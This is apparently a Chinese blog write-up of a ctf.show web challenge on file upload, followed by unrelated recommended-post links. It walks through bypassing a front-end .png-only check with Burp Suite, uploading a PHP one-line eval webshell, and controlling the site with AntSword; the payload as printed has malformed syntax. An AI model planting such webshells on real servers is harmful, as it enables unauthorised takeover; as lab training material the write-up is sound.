ctf show web 入门151

根据题目这是一道文件上传相关题目,我们先查看源代码看看有什么信息

这里说明只允许上传以png结尾的文件那么我们构造一个一句话木马但是以.png为后缀来绕过前端验证

构造的payload为: <?php @eval($_POST'attack');?>

密码为:attack

然后将文件命名为:文件名.png后上传文件同时打开bp抓包

将后缀重新改为.php文件就以.php的形式上传成功所以我们可以使用蚁剑连接

要注意我们需要将https改为http才能成功连接,接下来我们就掌握了该网站的控制权

最后发现flag在:/var/www/html/flag.php目录下

相关推荐
jike_20267 小时前
iPhone采访录音同时拍现场照片的APP:图片音频同步记录实测
笔记·智能手机·音视频·语音识别
————A8 小时前
Agent 接收用户上传文件
人工智能·笔记·python·状态模式
奔跑的痕迹8 小时前
如何删除引力画报?
笔记
zbyyd9 小时前
Linux 进程间通信学习笔记
linux·笔记·学习
知产xiao_xin9 小时前
知识产权入门 —— 版权
经验分享·笔记·知识产权
呆萌很9 小时前
英语 1‑12 月单词联想记忆
笔记
金立基包装胶水11 小时前
纸袋热封频繁不良,先排查胶料这一堆问题
大数据·笔记·其他
常驻客栈12 小时前
B-深入理解计算机系统第3版之第11章:网络编程
开发语言·笔记·学习笔记·常驻客栈·深入理解计算机系统
血小板要健康12 小时前
网格 dfs 与 FloodFill:从岛屿、区域到搜索路径
笔记·算法·leetcode·深度优先
NoteDeep 深度笔记12 小时前
Observer: 思维 ≠ 自己
笔记